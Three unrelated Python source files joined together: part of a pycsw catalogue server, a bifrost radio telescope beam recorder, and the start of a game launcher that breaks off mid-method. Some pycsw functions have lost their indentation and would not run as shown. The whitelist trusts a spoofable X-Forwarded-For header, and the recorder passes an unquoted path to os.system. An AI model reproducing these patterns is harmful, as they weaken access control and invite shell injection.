        node4 = etree.SubElement(
            node3,
            util.nspath_eval('soapenv:Reason', self.context.namespaces)
        )
        etree.SubElement(
            node4,
            util.nspath_eval('soapenv:Text', self.context.namespaces)
        ).text = 'A server exception was encountered.'
        node4 = etree.SubElement(
            node3,
            util.nspath_eval('soapenv:Detail', self.context.namespaces)
        )
        node4.append(self.response)
    else:
        node2.append(self.response)
    self.response = node
def _gen_manager(self):
""" Update self.context.model with CSW-T advertising """
if (self.config.has_option('manager', 'transactions') and
self.config.get('manager', 'transactions') == 'true'):
self.manager = True
self.context.model['operations_order'].append('Transaction')
self.context.model['operations']['Transaction'] = {
'methods': {'get': False, 'post': True},
'parameters': {}
}
schema_values = [
'http://www.opengis.net/cat/csw/2.0.2',
'http://www.opengis.net/cat/csw/3.0',
'http://www.opengis.net/wms',
'http://www.opengis.net/wmts/1.0',
'http://www.opengis.net/wfs',
'http://www.opengis.net/wfs/2.0',
'http://www.opengis.net/wcs',
'http://www.opengis.net/wps/1.0.0',
'http://www.opengis.net/sos/1.0',
'http://www.opengis.net/sos/2.0',
'http://www.isotc211.org/2005/gmi',
'urn:geoss:waf',
]
self.context.model['operations_order'].append('Harvest')
self.context.model['operations']['Harvest'] = {
'methods': {'get': False, 'post': True},
'parameters': {
'ResourceType': {'values': schema_values}
}
}
self.context.model['operations']['Transaction'] = {
'methods': {'get': False, 'post': True},
'parameters': {
'TransactionSchemas': {'values': sorted(schema_values)}
}
}
self.csw_harvest_pagesize = 10
if self.config.has_option('manager', 'csw_harvest_pagesize'):
self.csw_harvest_pagesize = int(
self.config.get('manager', 'csw_harvest_pagesize'))
def _test_manager(self):
    """ Verify that transactions are allowed

    Raises RuntimeError when the CSW-T interface is disabled or when the
    requesting IP address is not in the manager/allowed_ips whitelist.
    """
    if self.config.get('manager', 'transactions') != 'true':
        raise RuntimeError('CSW-T interface is disabled')
    # get the client first forwarded ip (proxy-aware), falling back to the
    # direct peer address
    if 'HTTP_X_FORWARDED_FOR' in self.environ:
        ipaddress = self.environ['HTTP_X_FORWARDED_FOR'].split(',')[0].strip()
    else:
        ipaddress = self.environ['REMOTE_ADDR']
    # reject when no whitelist is configured at all, or when one is
    # configured and the client address does not match it
    if not self.config.has_option('manager', 'allowed_ips') or \
            (self.config.has_option('manager', 'allowed_ips') and not
             util.ipaddress_in_whitelist(ipaddress,
                 self.config.get('manager', 'allowed_ips').split(','))):
        raise RuntimeError(
            'CSW-T operations not allowed for this IP address: %s' % ipaddress)
def _cql_update_queryables_mappings(self, cql, mappings):
""" Transform CQL query's properties to underlying DB columns """
LOGGER.debug('Raw CQL text = %s', cql)
LOGGER.debug(str(list(mappings.keys())))
if cql is not None:
for key in mappings.keys():
try:
cql = cql.replace(key, mappings[key]['dbcol'])
except:
cql = cql.replace(key, mappings[key])
LOGGER.debug('Interpolated CQL text = %s.', cql)
return cql
def _process_responsehandler(self, xml):
    """ Process response handler

    Delivers *xml* (the serialized response) to the URI in the
    responsehandler KVP: mailto: sends it via SMTP, ftp: uploads it.
    Delivery errors are logged, not raised (best-effort).
    """
    if self.kvp['responsehandler'] is not None:
        LOGGER.info('Processing responsehandler %s' %
                    self.kvp['responsehandler'])
        uprh = urlparse(self.kvp['responsehandler'])
        if uprh.scheme == 'mailto':  # email
            import smtplib
            LOGGER.debug('Email detected')
            # SMTP host from config, default localhost
            smtp_host = 'localhost'
            if self.config.has_option('server', 'smtp_host'):
                smtp_host = self.config.get('server', 'smtp_host')
            body = ('Subject: pycsw %s results\n\n%s' %
                    (self.kvp['request'], xml))
            try:
                LOGGER.info('Sending email')
                msg = smtplib.SMTP(smtp_host)
                msg.sendmail(
                    self.config.get('metadata:main', 'contact_email'),
                    uprh.path, body
                )
                msg.quit()
                LOGGER.debug('Email sent successfully.')
            except Exception as err:
                LOGGER.exception('Error processing email')
        elif uprh.scheme == 'ftp':
            import ftplib
            LOGGER.debug('FTP detected.')
            try:
                LOGGER.info('Sending to FTP server.')
                ftp = ftplib.FTP(uprh.hostname)
                # anonymous login unless credentials are in the URI
                if uprh.username is not None:
                    ftp.login(uprh.username, uprh.password)
                # NOTE(review): storbinary expects a binary file object; if
                # *xml* is str, StringIO will fail here -- confirm the type
                # callers pass.
                ftp.storbinary('STOR %s' % uprh.path[1:], StringIO(xml))
                ftp.quit()
                LOGGER.debug('FTP sent successfully.')
            except Exception as err:
                LOGGER.exception('Error processing FTP')
@staticmethod
def normalize_kvp(kvp):
"""Normalize Key Value Pairs.
This method will transform all keys to lowercase and leave values
unchanged, as specified in the CSW standard (see for example note
C on Table 62 - KVP Encoding for DescribeRecord operation request
of the CSW standard version 2.0.2)
:arg kvp: a mapping with Key Value Pairs
:type kvp: dict
:returns: A new dictionary with normalized parameters
"""
result = dict()
for name, value in kvp.items():
result[name.lower()] = value
return result
|
dr_beam.py | #!/usr/bin/env python
from __future__ import division, print_function
# Python 2 compatibility: alias the lazy xrange onto range when it exists;
# on Python 3 xrange is undefined and the NameError is deliberately ignored.
try:
    range = xrange
except NameError:
    pass
import os
import sys
import h5py
import json
import time
import numpy
import ctypes
import signal
import logging
import argparse
import threading
from functools import reduce
from datetime import datetime, timedelta
from mnc.common import *
from mnc.mcs import ImageMonitorPoint, MultiMonitorPoint, Client
from reductions import *
from operations import FileOperationsQueue
from monitoring import GlobalLogger
from control import PowerBeamCommandProcessor
from bifrost.address import Address
from bifrost.udp_socket import UDPSocket
from bifrost.packet_capture import PacketCaptureCallback, UDPCapture, DiskReader
from bifrost.ring import Ring
import bifrost.affinity as cpu_affinity
import bifrost.ndarray as BFArray
from bifrost.ndarray import copy_array
from bifrost.libbifrost import bf
from bifrost.proclog import ProcLog
from bifrost.memory import memcpy as BFMemCopy, memset as BFMemSet
from bifrost import asarray as BFAsArray
# Process-wide file-operations queue shared by WriterOp, the global logger
# and the power-beam command processor.
QUEUE = FileOperationsQueue()
class CaptureOp(object):
    """Capture 'pbeam' UDP packets into the output ring via bifrost UDPCapture."""

    def __init__(self, log, sock, oring, nserver, beam0=1, ntime_gulp=250,
                 slot_ntime=25000, shutdown_event=None, core=None):
        self.log = log
        self.sock = sock
        self.oring = oring
        self.nserver = nserver
        self.beam0 = beam0
        self.ntime_gulp = ntime_gulp
        self.slot_ntime = slot_ntime
        if shutdown_event is None:
            shutdown_event = threading.Event()
        self.shutdown_event = shutdown_event
        self.core = core

    def shutdown(self):
        # Ask the capture loop in main() to exit after the current recv
        self.shutdown_event.set()

    def seq_callback(self, seq0, time_tag, navg, chan0, nchan, nbeam, hdr_ptr, hdr_size_ptr):
        """Sequence-start callback: build the JSON ring header and hand a
        pointer to it back to the capture core."""
        #print("++++++++++++++++ seq0     =", seq0)
        #print("                 time_tag =", time_tag)
        time_tag *= 2*NCHAN        # Seems to be needed now
        hdr = {'time_tag': time_tag,
               'seq0':     seq0,
               'chan0':    chan0,
               'cfreq0':   chan0*CHAN_BW,
               'bw':       nchan*CHAN_BW,
               'navg':     navg,
               'nbeam':    nbeam,
               'nchan':    nchan,
               'npol':     4,
               'pols':     'XX,YY,CR,CI',
               'complex':  False,
               'nbit':     32}
        #print("******** HDR:", hdr)
        hdr_str = json.dumps(hdr).encode()
        # TODO: Can't pad with NULL because returned as C-string
        #hdr_str = json.dumps(hdr).ljust(4096, '\0')
        #hdr_str = json.dumps(hdr).ljust(4096, ' ')
        # BUGFIX: keep a reference on self -- the capture core reads the
        # header through the raw pointer after this callback returns, so a
        # purely local buffer could be garbage-collected first
        # (use-after-free).
        self.header_buf = ctypes.create_string_buffer(hdr_str)
        hdr_ptr[0] = ctypes.cast(self.header_buf, ctypes.c_void_p)
        hdr_size_ptr[0] = len(hdr_str)
        return 0

    def main(self):
        """Run the UDP capture until shutdown is requested or the capture
        core reports a terminal status."""
        seq_callback = PacketCaptureCallback()
        seq_callback.set_pbeam(self.seq_callback)
        with UDPCapture("pbeam", self.sock, self.oring, self.nserver, self.beam0, 9000,
                        self.ntime_gulp, self.slot_ntime,
                        sequence_callback=seq_callback, core=self.core) as capture:
            while not self.shutdown_event.is_set():
                status = capture.recv()
                # statuses signalling end-of-stream/error -> stop capturing
                if status in (1,4,5,6):
                    break
        del capture
class DummyOp(object):
    """Offline stand-in for CaptureOp: fills the output ring with random
    float32 spectra at the cadence a real packet capture would produce."""
    def __init__(self, log, sock, oring, nserver, beam0=1, ntime_gulp=250,
                 slot_ntime=25000, shutdown_event=None, core=None):
        self.log = log
        self.sock = sock
        self.oring = oring
        self.nserver = nserver
        self.beam0 = beam0
        self.ntime_gulp = ntime_gulp
        self.slot_ntime = slot_ntime
        if shutdown_event is None:
            shutdown_event = threading.Event()
        self.shutdown_event = shutdown_event
        self.core = core
        # bifrost process logs consumed by external monitoring tools
        self.bind_proclog = ProcLog(type(self).__name__+"/bind")
        self.out_proclog = ProcLog(type(self).__name__+"/out")
        self.size_proclog = ProcLog(type(self).__name__+"/size")
        self.perf_proclog = ProcLog(type(self).__name__+"/perf")
        self.out_proclog.update({'nring': 1, 'ring0': self.oring.name})
        self.size_proclog.update({'nseq_per_gulp': self.ntime_gulp})
    def shutdown(self):
        # Ask the generator loop in main() to exit at the next gulp boundary
        self.shutdown_event.set()
    def main(self):
        """Write random-data gulps to the ring, pacing each gulp to the
        wall-clock time a real integration would take, until shutdown."""
        with self.oring.begin_writing() as oring:
            navg = 24
            tint = navg / CHAN_BW           # integration time per spectrum
            tgulp = tint * self.ntime_gulp  # wall-clock duration of one gulp
            nbeam = 1
            chan0 = 1234
            nchan = 16*192
            npol = 4
            # synthetic ring header mirroring CaptureOp.seq_callback
            ohdr = {'time_tag': int(int(time.time())*FS),
                    'seq0': 0,
                    'chan0': chan0,
                    'cfreq0': chan0*CHAN_BW,
                    'bw': nchan*CHAN_BW,
                    'navg': navg,
                    'nbeam': nbeam,
                    'nchan': nchan,
                    'npol': npol,
                    'pols': 'XX,YY,CR,CI',
                    'complex': False,
                    'nbit': 32}
            ohdr_str = json.dumps(ohdr)
            ogulp_size = self.ntime_gulp*nbeam*nchan*npol*4  # float32
            oshape = (self.ntime_gulp,nbeam,nchan,npol)
            self.oring.resize(ogulp_size)
            prev_time = time.time()
            with oring.begin_sequence(time_tag=ohdr['time_tag'], header=ohdr_str) as oseq:
                while not self.shutdown_event.is_set():
                    with oseq.reserve(ogulp_size) as ospan:
                        curr_time = time.time()
                        reserve_time = curr_time - prev_time
                        prev_time = curr_time
                        odata = ospan.data_view(numpy.float32).reshape(oshape)
                        odata[...] = numpy.random.randn(*oshape)
                        # throttle so gulps are emitted in (near) real time
                        curr_time = time.time()
                        while curr_time - prev_time < tgulp:
                            time.sleep(0.01)
                            curr_time = time.time()
                    curr_time = time.time()
                    process_time = curr_time - prev_time
                    prev_time = curr_time
                    self.perf_proclog.update({'acquire_time': -1,
                                              'reserve_time': reserve_time,
                                              'process_time': process_time,})
class SpectraOp(object):
    """Consume beam data from the ring and publish a diagnostic spectrum
    plot (as a monitor point and a PNG on disk) roughly once a minute."""
    def __init__(self, log, id, iring, ntime_gulp=250, guarantee=True, core=None):
        self.log = log
        self.iring = iring
        self.ntime_gulp = ntime_gulp
        self.guarantee = guarantee
        self.core = core
        # MCS client used to publish the rendered figure
        self.client = Client(id)
        # bifrost process logs consumed by external monitoring tools
        self.bind_proclog = ProcLog(type(self).__name__+"/bind")
        self.in_proclog = ProcLog(type(self).__name__+"/in")
        self.size_proclog = ProcLog(type(self).__name__+"/size")
        self.sequence_proclog = ProcLog(type(self).__name__+"/sequence0")
        self.perf_proclog = ProcLog(type(self).__name__+"/perf")
        self.in_proclog.update({'nring': 1, 'ring0': self.iring.name})
        self.size_proclog.update({'nseq_per_gulp': self.ntime_gulp})
    def main(self):
        """Read gulps from the input ring and render/publish spectra."""
        if self.core is not None:
            cpu_affinity.set_core(self.core)
        self.bind_proclog.update({'ncore': 1,
                                  'core0': cpu_affinity.get_core(),})
        # Setup the figure
        ## Import - deferred so matplotlib is only loaded in this thread,
        ## with the non-interactive Agg backend
        import matplotlib
        matplotlib.use('Agg')
        from matplotlib import pyplot as plt
        from matplotlib.ticker import MultipleLocator
        ## Create
        fig = plt.Figure(figsize=(6,6))
        ax = fig.gca()
        for iseq in self.iring.read(guarantee=self.guarantee):
            ihdr = json.loads(iseq.header.tostring())
            self.sequence_proclog.update(ihdr)
            self.log.info("Spectra: Start of new sequence: %s", str(ihdr))
            # Setup the ring metadata and gulp sizes
            time_tag = ihdr['time_tag']
            navg = ihdr['navg']
            nbeam = ihdr['nbeam']
            chan0 = ihdr['chan0']
            nchan = ihdr['nchan']
            chan_bw = ihdr['bw'] / nchan
            npol = ihdr['npol']
            pols = ihdr['pols']
            igulp_size = self.ntime_gulp*nbeam*nchan*npol*4  # float32
            ishape = (self.ntime_gulp,nbeam,nchan,npol)
            # NOTE(review): frequency axis uses the global CHAN_BW rather
            # than the per-sequence chan_bw computed above -- confirm they
            # always agree.
            frange = (numpy.arange(nchan) + chan0) * CHAN_BW
            last_save = 0.0
            prev_time = time.time()
            iseq_spans = iseq.read(igulp_size)
            for ispan in iseq_spans:
                if ispan.size < igulp_size:
                    continue  # Ignore final gulp
                curr_time = time.time()
                acquire_time = curr_time - prev_time
                prev_time = curr_time
                ## Setup and load
                idata = ispan.data_view(numpy.float32).reshape(ishape)
                # at most one plot per minute
                if time.time() - last_save > 60:
                    ## Timestamp
                    tt = LWATime(time_tag, format='timetag')
                    ts = tt.datetime.strftime('%y%m%d %H:%M:%S')
                    ## Average over time
                    sdata = idata.mean(axis=0)
                    ## Create a diagnostic plot after suming the flags across polarization
                    ax.cla()
                    ax.plot(frange/1e6, numpy.log10(sdata[0,:,0])*10, color='#1F77B4')
                    ax.plot(frange/1e6, numpy.log10(sdata[0,:,1])*10, color='#FF7F0E')
                    ax.set_xlim((frange[0]/1e6,frange[-1]/1e6))
                    ax.set_xlabel('Frequency [MHz]')
                    ax.set_ylabel('Power [arb. dB]')
                    ax.xaxis.set_major_locator(MultipleLocator(base=10.0))
                    fig.tight_layout()
                    ## Save
                    tt = LWATime(time_tag, format='timetag')
                    mp = ImageMonitorPoint.from_figure(fig)
                    self.client.write_monitor_point('diagnostics/spectra',
                                                    mp, timestamp=tt.unix)
                    if True:
                        ## Save again, this time to disk
                        mjd, dt = tt.mjd, tt.datetime
                        mjd = int(mjd)
                        h, m, s = dt.hour, dt.minute, dt.second
                        filename = '%06i_%02i%02i%02i.png' % (mjd, h, m, s)
                        mp.to_file(filename)
                    last_save = time.time()
                # advance the ring timestamp by one gulp
                time_tag += navg * self.ntime_gulp * (int(FS) // int(CHAN_BW))
                curr_time = time.time()
                process_time = curr_time - prev_time
                prev_time = curr_time
                self.perf_proclog.update({'acquire_time': acquire_time,
                                          'reserve_time': -1,
                                          'process_time': process_time,})
        self.log.info("SpectraOp - Done")
class StatisticsOp(object):
    """Consume beam data from the ring and publish per-polarization
    min/avg/max statistics as monitor points roughly once a minute."""
    def __init__(self, log, id, iring, ntime_gulp=250, guarantee=True, core=None):
        self.log = log
        self.iring = iring
        self.ntime_gulp = ntime_gulp
        self.guarantee = guarantee
        self.core = core
        # MCS client used to publish statistics
        self.client = Client(id)
        # bifrost process logs consumed by external monitoring tools
        self.bind_proclog = ProcLog(type(self).__name__+"/bind")
        self.in_proclog = ProcLog(type(self).__name__+"/in")
        self.size_proclog = ProcLog(type(self).__name__+"/size")
        self.sequence_proclog = ProcLog(type(self).__name__+"/sequence0")
        self.perf_proclog = ProcLog(type(self).__name__+"/perf")
        self.in_proclog.update({'nring': 1, 'ring0': self.iring.name})
        self.size_proclog.update({'nseq_per_gulp': self.ntime_gulp})
    def main(self):
        """Read gulps from the input ring and publish summary statistics."""
        if self.core is not None:
            cpu_affinity.set_core(self.core)
        self.bind_proclog.update({'ncore': 1,
                                  'core0': cpu_affinity.get_core(),})
        for iseq in self.iring.read(guarantee=self.guarantee):
            ihdr = json.loads(iseq.header.tostring())
            self.sequence_proclog.update(ihdr)
            self.log.info("Statistics: Start of new sequence: %s", str(ihdr))
            # Setup the ring metadata and gulp sizes
            time_tag = ihdr['time_tag']
            navg = ihdr['navg']
            nbeam = ihdr['nbeam']
            chan0 = ihdr['chan0']
            nchan = ihdr['nchan']
            chan_bw = ihdr['bw'] / nchan
            npol = ihdr['npol']
            pols = ihdr['pols']
            igulp_size = self.ntime_gulp*nbeam*nchan*npol*4  # float32
            ishape = (self.ntime_gulp,nbeam,nchan,npol)
            # polarization labels used as monitor-point field names
            data_pols = pols.split(',')
            last_save = 0.0
            prev_time = time.time()
            iseq_spans = iseq.read(igulp_size)
            for ispan in iseq_spans:
                if ispan.size < igulp_size:
                    continue  # Ignore final gulp
                curr_time = time.time()
                acquire_time = curr_time - prev_time
                prev_time = curr_time
                ## Setup and load
                idata = ispan.data_view(numpy.float32).reshape(ishape)
                # flatten time/beam/channel so the reductions below are per-pol
                idata = idata.reshape(-1, npol)
                # at most one update per minute
                if time.time() - last_save > 60:
                    ## Timestamp
                    tt = LWATime(time_tag, format='timetag')
                    ts = tt.unix
                    ## Run the statistics over all times/channels
                    ##  * only really works for nbeam=1
                    data_min = numpy.min(idata, axis=0)
                    data_max = numpy.max(idata, axis=0)
                    data_avg = numpy.mean(idata, axis=0)
                    ## Save
                    for data,name in zip((data_min,data_avg,data_max), ('min','avg','max')):
                        value = MultiMonitorPoint(data.tolist(), timestamp=ts, field=data_pols)
                        self.client.write_monitor_point('statistics/%s' % name, value)
                    last_save = time.time()
                # advance the ring timestamp by one gulp
                time_tag += navg * self.ntime_gulp * (int(FS) // int(CHAN_BW))
                curr_time = time.time()
                process_time = curr_time - prev_time
                prev_time = curr_time
                self.perf_proclog.update({'acquire_time': acquire_time,
                                          'reserve_time': -1,
                                          'process_time': process_time,})
        self.log.info("StatisticsOp - Done")
class WriterOp(object):
    """Consume beam data from the ring and, when a recording operation is
    active on the global QUEUE, write the data to disk."""
    def __init__(self, log, iring, ntime_gulp=250, guarantee=True, core=None):
        self.log = log
        self.iring = iring
        self.ntime_gulp = ntime_gulp
        self.guarantee = guarantee
        self.core = core
        # bifrost process logs consumed by external monitoring tools
        self.bind_proclog = ProcLog(type(self).__name__+"/bind")
        self.in_proclog = ProcLog(type(self).__name__+"/in")
        self.size_proclog = ProcLog(type(self).__name__+"/size")
        self.sequence_proclog = ProcLog(type(self).__name__+"/sequence0")
        self.perf_proclog = ProcLog(type(self).__name__+"/perf")
        self.in_proclog.update({'nring': 1, 'ring0': self.iring.name})
        self.size_proclog.update({'nseq_per_gulp': self.ntime_gulp})
    def main(self):
        """Read gulps and feed them to the active recording, if any."""
        global QUEUE
        if self.core is not None:
            cpu_affinity.set_core(self.core)
        self.bind_proclog.update({'ncore': 1,
                                  'core0': cpu_affinity.get_core(),})
        for iseq in self.iring.read(guarantee=self.guarantee):
            ihdr = json.loads(iseq.header.tostring())
            self.sequence_proclog.update(ihdr)
            self.log.info("Writer: Start of new sequence: %s", str(ihdr))
            # Setup the ring metadata and gulp sizes
            time_tag = ihdr['time_tag']
            navg = ihdr['navg']
            nbeam = ihdr['nbeam']
            chan0 = ihdr['chan0']
            nchan = ihdr['nchan']
            chan_bw = ihdr['bw'] / nchan
            npol = ihdr['npol']
            pols = ihdr['pols']
            # rename the cross terms to the names used in the output files
            pols = pols.replace('CR', 'XY_real')
            pols = pols.replace('CI', 'XY_imag')
            igulp_size = self.ntime_gulp*nbeam*nchan*npol*4  # float32
            ishape = (self.ntime_gulp,nbeam,nchan,npol)
            self.iring.resize(igulp_size, 10*igulp_size)
            first_gulp = True
            was_active = False
            prev_time = time.time()
            iseq_spans = iseq.read(igulp_size)
            for ispan in iseq_spans:
                if ispan.size < igulp_size:
                    continue  # Ignore final gulp
                curr_time = time.time()
                acquire_time = curr_time - prev_time
                prev_time = curr_time
                ## On our first span, update the pipeline lag for the queue
                ## so that we start recording at the right times
                if first_gulp:
                    QUEUE.update_lag(LWATime(time_tag, format='timetag').datetime)
                    self.log.info("Current pipeline lag is %s", QUEUE.lag)
                    first_gulp = False
                ## Setup and load
                idata = ispan.data_view(numpy.float32).reshape(ishape)
                ## Determine what to do
                if QUEUE.active is not None:
                    ### Recording active - write
                    if not QUEUE.active.is_started:
                        self.log.info("Started operation - %s", QUEUE.active)
                        QUEUE.active.start(1, chan0, navg, nchan, chan_bw, npol, pols)
                        was_active = True
                    QUEUE.active.write(time_tag, idata)
                elif was_active:
                    ### Recording just finished - clean
                    #### Clean
                    was_active = False
                    QUEUE.clean()
                    #### Close
                    self.log.info("Ended operation - %s", QUEUE.previous)
                    QUEUE.previous.stop()
                # advance the ring timestamp by one gulp
                time_tag += navg * self.ntime_gulp * (int(FS) // int(CHAN_BW))
                curr_time = time.time()
                process_time = curr_time - prev_time
                prev_time = curr_time
                self.perf_proclog.update({'acquire_time': acquire_time,
                                          'reserve_time': -1,
                                          'process_time': process_time,})
        self.log.info("WriterOp - Done")
def main(argv):
    """Entry point: parse arguments, build the capture/analysis/writer
    pipeline, launch one thread per block, kick off a 30 s test recording
    and wait for shutdown.

    :param argv: command-line arguments (unused; argparse reads sys.argv)
    :returns: process exit status (0 on clean shutdown)
    """
    parser = argparse.ArgumentParser(
        description="Data recorder for power beams"
    )
    parser.add_argument('-a', '--address', type=str, default='127.0.0.1',
                        help='IP address to listen to')
    parser.add_argument('-p', '--port', type=int, default=10000,
                        help='UDP port to receive data on')
    parser.add_argument('-o', '--offline', action='store_true',
                        help='run in offline using the specified file to read from')
    parser.add_argument('-b', '--beam', type=int, default=1,
                        help='beam to receive data for')
    parser.add_argument('-c', '--cores', type=str, default='0,1,2,3',
                        help='comma separated list of cores to bind to')
    parser.add_argument('-g', '--gulp-size', type=int, default=1000,
                        help='gulp size for ring buffers')
    parser.add_argument('-l', '--logfile', type=str,
                        help='file to write logging to')
    parser.add_argument('-r', '--record-directory', type=str, default=os.path.abspath('.'),
                        help='directory to save recorded files to')
    parser.add_argument('-q', '--record-directory-quota', type=quota_size, default=0,
                        help='quota for the recording directory, 0 disables the quota')
    parser.add_argument('-f', '--fork', action='store_true',
                        help='fork and run in the background')
    args = parser.parse_args()

    # Fork, if requested
    if args.fork:
        # BUGFIX: the original interpolated an undefined name `tuning` here,
        # which raised NameError whenever --fork was given; use the beam
        # number to keep the stderr file unique per instance.
        stderr = '/tmp/%s_%i.stderr' % (os.path.splitext(os.path.basename(__file__))[0], args.beam)
        daemonize(stdin='/dev/null', stdout='/dev/null', stderr=stderr)

    # Setup logging
    log = logging.getLogger(__name__)
    logFormat = logging.Formatter('%(asctime)s [%(levelname)-8s] %(message)s',
                                  datefmt='%Y-%m-%d %H:%M:%S')
    logFormat.converter = time.gmtime
    if args.logfile is None:
        logHandler = logging.StreamHandler(sys.stdout)
    else:
        logHandler = LogFileHandler(args.logfile)
    logHandler.setFormatter(logFormat)
    log.addHandler(logHandler)
    log.setLevel(logging.DEBUG)

    log.info("Starting %s with PID %i", os.path.basename(__file__), os.getpid())
    log.info("Cmdline args:")
    for arg in vars(args):
        log.info("  %s: %s", arg, getattr(args, arg))

    # Setup the subsystem ID
    mcs_id = 'dr%i' % args.beam

    # Setup the cores and GPUs to use
    cores = [int(v, 10) for v in args.cores.split(',')]
    log.info("CPUs:         %s", ' '.join([str(v) for v in cores]))

    # Setup the socket, if needed
    isock = None
    if not args.offline:
        iaddr = Address(args.address, args.port)
        isock = UDPSocket()
        isock.bind(iaddr)

    # Setup the rings
    capture_ring = Ring(name="capture")
    write_ring = Ring(name="write")

    # Setup the recording directory, if needed
    if not os.path.exists(args.record_directory):
        status = os.system('mkdir -p %s' % args.record_directory)
        if status != 0:
            raise RuntimeError("Unable to create directory: %s" % args.record_directory)
    else:
        if not os.path.isdir(os.path.realpath(args.record_directory)):
            raise RuntimeError("Cannot record to a non-directory: %s" % args.record_directory)

    # Setup the blocks: capture (or offline dummy) feeding spectra plots,
    # statistics, the disk writer, plus the global logger and the MCS
    # command processor
    ops = []
    if args.offline:
        ops.append(DummyOp(log, isock, capture_ring, NPIPELINE,
                           ntime_gulp=args.gulp_size, slot_ntime=1000, core=cores.pop(0)))
    else:
        ops.append(CaptureOp(log, isock, capture_ring, NPIPELINE,
                             ntime_gulp=args.gulp_size, slot_ntime=1000, core=cores.pop(0)))
    ops.append(SpectraOp(log, mcs_id, capture_ring,
                         ntime_gulp=args.gulp_size, core=cores.pop(0)))
    ops.append(StatisticsOp(log, mcs_id, capture_ring,
                            ntime_gulp=args.gulp_size, core=cores.pop(0)))
    ops.append(WriterOp(log, capture_ring,
                        ntime_gulp=args.gulp_size, core=cores.pop(0)))
    ops.append(GlobalLogger(log, mcs_id, args, QUEUE, quota=args.record_directory_quota))
    ops.append(PowerBeamCommandProcessor(log, mcs_id, args.record_directory, QUEUE))

    # Setup the threads
    threads = [threading.Thread(target=op.main) for op in ops]

    # Setup signal handling; the capture block and the last two service
    # blocks share the same shutdown event
    shutdown_event = setup_signal_handling(ops)
    ops[0].shutdown_event = shutdown_event
    ops[-2].shutdown_event = shutdown_event
    ops[-1].shutdown_event = shutdown_event

    # Launch!
    log.info("Launching %i thread(s)", len(threads))
    for thread in threads:
        #thread.daemon = True
        thread.start()
    # Kick off a 30 s, 250-sample-average test recording starting ~15 s out
    t_now = LWATime(datetime.utcnow() + timedelta(seconds=15), format='datetime', scale='utc')
    mjd_now = int(t_now.mjd)
    mpm_now = int((t_now.mjd - mjd_now)*86400.0*1000.0)
    c = Client()
    r = c.send_command(mcs_id, 'record',
                       start_mjd=mjd_now, start_mpm=mpm_now, duration_ms=30*1000,
                       time_avg=250)
    print('III', r)
    while not shutdown_event.is_set():
        signal.pause()
    log.info("Shutdown, waiting for threads to join")
    for thread in threads:
        thread.join()
    log.info("All done")
    return 0

if __name__ == '__main__':
    sys.exit(main(sys.argv))
|
main.py | import json
import os
import sys
import threading
import modules.ui
import modules.engine
import modules.networking
import modules.editor
import modules.netclients
class App:
    """Top-level application object: owns the UI, game engine, editor and
    networking client/server, and wires UI triggers to their handlers."""
    def __init__(self):
        self.editor = None
        self.game = None
        self.client = None
        self.server = None
        self.ui = None

        # First run: materialize user config/debug files from the defaults
        if not os.path.isfile(os.path.join(sys.path[0], 'user', 'config.json')):
            with open(os.path.join(sys.path[0], 'user', 'default_config.json'), 'r') as file:
                with open(os.path.join(sys.path[0], 'user', 'config.json'), 'w') as writeto_file:
                    writeto_file.write(file.read())
        if not os.path.isfile(os.path.join(sys.path[0], 'user', 'debug.json')):
            with open(os.path.join(sys.path[0], 'user', 'default_debug.json'), 'r') as file:
                with open(os.path.join(sys.path[0], 'user', 'debug.json'), 'w') as writeto_file:
                    writeto_file.write(file.read())

        # tkinter runs on this (main) thread; the rest of the setup
        # continues on a worker thread once the UI has checked in
        self.ui = modules.ui.UI(autostart = False)
        threading.Thread(target = self.initialise_ui).start()
        self.ui.tkthread()
    def initialise_ui(self):
        """Configure the UI (menu, geometry, window state) and register all
        trigger callbacks; runs on a worker thread after UI check-in."""
        self.ui.wait_for_checkin()
        with open(os.path.join(sys.path[0], 'user', 'config.json'), 'r') as file:
            settingsdata = json.load(file)
        self.ui.load('menu')
        self.ui.set_base_title('Hydrophobes')
        self.ui.set_geometry('{}x{}'.format(*settingsdata['graphics']['resolution']))
        # window state 0/1 -> normal/zoomed; anything else -> fullscreen
        if settingsdata['default window state'] in [0, 1]:
            self.ui.root.state(['normal', 'zoomed'][settingsdata['default window state']])
            self.ui.root.attributes('-fullscreen', False)
        else:
            self.ui.root.attributes('-fullscreen', True)
        self.ui.set_trigger('connect to server', self.connect_to_server)
        self.ui.set_trigger('create game object', self.create_game_object)
        self.ui.set_trigger('window closed', self.on_window_close)
        self.ui.set_trigger('close game', self.close_game)
        self.ui.set_trigger('edit map', self.map_edit)
        self.ui.set_trigger('new map', self.map_make_new)
        self.ui.set_trigger('start editor', self.start_editor)
        self.ui.set_trigger('close editor', self.close_editor)
        self.ui.set_trigger('quit', self.close)
        self.ui.set_trigger('host server', self.host_server)
        self.ui.set_trigger('close server', self.close_server)
        self.ui.set_trigger('request client', self.get_network_client)
    def connect_to_server(self, server_data):
        """Connect to a server, first starting a local one when
        server_data['internal'] is set."""
        with open(os.path.join(sys.path[0], 'user', 'config.json'), 'r') as file:
            settingsdata = json.load(file)
        with open(os.path.join(sys.path[0], 'server', 'config.json'), 'r') as file:
            serversettingsdata = json.load(file)
        if server_data['internal']:
            # spin up an in-process server before connecting to it
            if server_data['port'] == 'normal':
                self.server = modules.networking.Server(serversettingsdata['network']['port'])
            else:
                self.server = modules.networking.Server(server_data['port'])
        # 'normal' means use the configured default port
        if server_data['port'] == 'normal':
            server_data['port'] = settingsdata['network']['default port']
        self.client = modules.netclients.Client(server_data, self.ui)
        self.ui.load('server connected')
    def host_server(self, console_frame):
        """Start a standalone server using the server config, attached to
        the given console frame."""
        with open(os.path.join(sys.path[0], 'server', 'config.json'), 'r') as file:
            serversettingsdata = json.load(file)
        self.server = modules.networking.Server(serversettingsdata['network']['port'], console_frame)
    def close_server(self):
        """Stop the hosted server (currently a no-op)."""
        pass
    def create_game_object(self, canvas):
        """Create the game engine bound to the given canvas and the
        current network client."""
        self.game = modules.engine.Game(canvas, self.client, self.ui)
    def close_game(self):
        """Shut down the running game engine."""
        self.game.close()
    def map_edit(self, map_name):
        """Remember the map to edit and switch the UI to the editor page."""
        self.editor_mapname = map_name
        self.ui.load('editor')
    def map_make_new(self, map_name):
        """Create a new map (not implemented yet)."""
        pass
    def start_editor(self, page):
        """Instantiate the editor on the given page and load the map
        selected via map_edit."""
        self.editor = modules.editor.Editor(page)
        self.editor.load(self.editor_mapname)
    def close_editor(self):
        """Shut down the map editor."""
        self.editor.close()
    def on_window_close(self):
        """Exit the process when the main window closes."""
